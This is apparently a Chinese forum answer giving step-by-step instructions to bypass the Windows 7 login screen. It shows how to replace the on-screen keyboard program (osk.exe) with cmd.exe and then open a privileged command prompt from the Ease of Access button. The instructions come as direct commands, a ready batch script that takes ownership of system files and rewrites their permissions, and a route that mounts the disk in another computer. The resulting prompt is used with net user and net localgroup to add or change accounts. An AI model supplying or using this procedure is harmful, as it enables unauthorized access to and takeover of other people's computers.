如题所述
你好
步骤方法 如下
因为win7的登录界面,点击“轻松访问”可以运行一些程序,我们只要替换掉其中某个程序的文件名,改为执行“命令提示符”的程序c:\windows\system32\cmd.exe,之后就可以通过net user命令和net localgroup命令添加或修改用户信息了
以“屏幕键盘”程序为例子,其文件名本来是osk.exe,我们将之改名为osk1.exe,之后再复制一份cmd.exe,并将其改名为osk.exe,伪装为屏幕键盘程序。这样,在登录界面就可以直接运行cmd.exe程序了!
步骤,以下都是命令行执行的命令:
c:
cd c:\windows\system32
ren osk.exe osk1.exe
copy cmd.exe osk.exe
或者用下面 批处理 修改权限 替换
@echo off
echo 正在修改权限....
takeown /f %windir%\system32\cmd.exe /A >nul
echo.
takeown /f %windir%\system32\osk.exe /A >nul
echo.
echo y|cacls %windir%\system32\osk.exe /A /R >nul
echo y|cacls.exe c:\windows\system32\cmd.exe /E /C /P Administrator:f
echo y|cacls.exe c:\windows\system32\osk.exe /E /C /P Administrator:f
echo.
ren c:\windows\system32\osk.exe osk1.exe
ren c:\windows\system32\cmd.exe osk.exe
echo.
echo 请按任意键退出
pause >nul
把硬盘拆下来挂在另一台电脑上,打开Win7的X:\windows\system32文件夹,将这里的”osk.exe”剪切到其他位置,将”cmd.exe”更名为 ”osk.exe”,然后将硬盘装回去重新启动。
到Win7登录窗口,单击屏幕左下角的“轻松访问”图标,然后在弹出的窗口勾选“启动屏幕键盘”,单击“确定 ”,此时启动的就是命令提示符了。
